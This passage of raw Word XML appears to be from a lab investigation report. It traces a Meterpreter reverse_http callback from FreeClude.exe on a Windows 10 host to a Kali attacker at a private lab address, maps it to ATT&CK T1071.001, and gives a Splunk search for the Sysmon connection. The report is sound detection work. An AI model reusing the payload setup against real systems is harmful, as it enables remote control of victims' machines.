                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SignatureStatus: Unavailable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="778DFD04">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73A016D0">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SHA256: 7673C78000C1DF5FDD6C863C494F2D00FC961C947F2B8ABD0E7BCC212765EBF1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D90E36A"/>
    <w:p w14:paraId="38BAADB7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D1A7C">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>07 / COMMAND &amp; CONTROL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C917EDB">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3 — Meterpreter Reverse HTTP Command &amp; Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43A6C4">
      <w:pPr>
        <w:pStyle w:val="36"/>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third phase begins when the executed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FreeClude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload establishes communication with the Kali attacker system. The lab execution shows a Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>windows/x64/meterpreter/reverse_http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload configured for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.110.141:33398</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, followed by a callback from the Windows 10 endpoint at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.110.156</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sysmon Event 3 from Phase 2 provides the endpoint-side correlation between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FreeClude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and this connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D7A0B">
      <w:pPr>
        <w:pStyle w:val="36"/>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observed communication is mapped to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T1071.001 — Web Protocols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the configured </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reverse_http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload and Metasploit handler. The Sysmon network event should be correlated using the payload's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProcessGuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing the connection to be linked with the executable identified in the previous phase. The later </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>systeminfo.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> events represent post-exploitation activity and should be analyzed in the following phases rather than treated as C2 evidence. The Windows Defender connection to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>20.52.64.204:443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is unrelated to the lab callback and should be excluded from the C2 timeline.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="39"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="998" w:tblpY="5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8497"/>
      </w:tblGrid>
      <w:tr w14:paraId="4062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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ECFA401">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="268A8A5C">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="379C5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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05FE37A4">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Scenario variant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="310B84C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Meterpreter reverse HTTP callback from Windows 10 to the Kali attacker host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D3CF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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EB86613">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ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FCCA9C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T1071.001 — Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C71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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A4363B0">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What to prove</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EC31B6A">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FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> established the Meterpreter callback to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>192.168.110.141:33398</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1B8F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1622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="707DBEA9">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Suggested evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A40206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Metasploit handler output + Sysmon Event 3 + ProcessGuid correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="50D6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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BD6665D">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C2 source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42089075">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192.168.110.156:55196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> — Windows 10 endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06EF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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="284E94F9">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C2 destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F0C648B">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192.168.110.141:33398</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> — Kali attacker host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53BE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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BC6B447">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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AC6E71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TCP; HTTP behavior is supported by the configured </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>reverse_http</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59AF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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CF04759">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Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B1E52C7">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C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="348D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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E0F9B5A">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="none"/>
                <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Process ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="131458A7">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5568</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59F6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622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DB2E906">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="none"/>
                <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>ProcessGuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6420A8BC">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Style w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">{4736c562-214c-6ab5-f802-000000001c00} </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F30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1622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="690E1907">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>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Supporting evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="345BAED8">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="20"/>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 xml:space="preserve">Metasploit reverse HTTP handler + callback from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>192.168.110.156:55196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Sysmon Event 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="307F822C">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417DED22">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First-pass C2 Network Search</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10052"/>
      </w:tblGrid>
      <w:tr w14:paraId="3884726B">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="502CB472">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index=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">internal  host="Sh-Win10" EventCode=3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508E4F7D">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xml:space="preserve">| search DestinationIp="192.168.110.141" DestinationPort=33398 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68758A10">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">| table _time host Image User ProcessGuid ProcessId Protocol SourceIp SourcePort DestinationIp DestinationPort </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4489A764">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBB4AD9">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
